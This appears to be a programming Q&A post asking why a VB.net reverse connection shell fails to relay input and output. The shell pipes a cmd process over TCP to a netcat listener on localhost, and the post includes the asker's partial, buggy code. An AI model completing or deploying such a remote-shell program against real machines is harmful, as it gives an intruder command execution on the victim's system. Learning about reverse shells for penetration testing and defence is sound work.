# Vb.net Reverse Connection Shell - Asynchronous read and write failures

Tags: c#, vb.net, shell, asynchronous, stream

I'm trying to code some VB.net program which communicates a cmd shell through a tcp connection to a netcat listening server. It is based on a reverse connection shell, so when I ask the app it should connect to the server and serve a cmd prompt. It is based on this project [LINK](http://www.codeproject.com/Articles/20250/Reverse-Connection-Shell), but I specifically need to run it on vb.

Here's the code so far I've managed to produce:

```
Dim TcpClient As TcpClient
    Dim NetworkStream As NetworkStream
    Dim streamWriter As StreamWriter
    Dim streamReader As StreamReader
    Dim processCmd As New Process()
    Dim procesoInfo As New ProcessStartInfo()

    TcpClient = New TcpClient()
    Dim strInput As New StringBuilder()

    If (TcpClient.Connected = False) Then

        Try

            TcpClient.Connect("localhost", 6666)
            NetworkStream = TcpClient.GetStream()
            streamReader = New StreamReader(NetworkStream)
            streamWriter = New StreamWriter(NetworkStream)

        Catch ex As Exception
            MsgBox("Connection unavailable")
            Return "nope"
        End Try

        procesoInfo.FileName = "CMD"
        'procesoInfo.CreateNoWindow = True
        procesoInfo.UseShellExecute = False
        procesoInfo.RedirectStandardOutput = True
        procesoInfo.RedirectStandardInput = True
        procesoInfo.RedirectStandardError = True

        AddHandler processCmd.OutputDataReceived, AddressOf processCmdHandler
        processCmd.StartInfo = procesoInfo
        processCmd.Start()

        processCmd.BeginOutputReadLine()

    End If

    While (True)

        Try

            strInput.Append(streamReader.ReadLine())
            strInput.Append("\n")
            If (strInput.ToString().LastIndexOf("exit") >= 0) Then
                processCmd.Kill()
                streamReader.Close()
                streamWriter.Close()
                NetworkStream.Close()
                System.Environment.Exit(System.Environment.ExitCode)
            End If

            processCmd.StandardInput.WriteLine(strInput)
            strInput.Remove(0, strInput.Length)

        Catch Ex As Exception

            streamReader.Close()
            streamWriter.Close()


        End Try

    End While
```

Here is the event handler to manage the asynchronous standardOutput read operations:

```
Private Shared Sub processCmdHandler(sendingProcess As Object, outline As DataReceivedEventArgs)

    Dim strOutput As New StringBuilder()
    If Not String.IsNullOrEmpty(outline.Data) Then

        Try
            strOutput.Append(outline.Data)
            streamWriter.WriteLine(strOutput)
            streamWriter.Flush()
        Catch ex As Exception

        End Try
    End If
End Sub
```

So far, the connection works perfectly, and the process is created but however, it does not appear like it is managing to redirect the output nor the input of the shell. Note that the network stream works perfectly since if I type "exit" it closes succesfully the connection. Im kinda lost about what I'm doing wrong here.Any help is warmly welcome

Thanks in advance!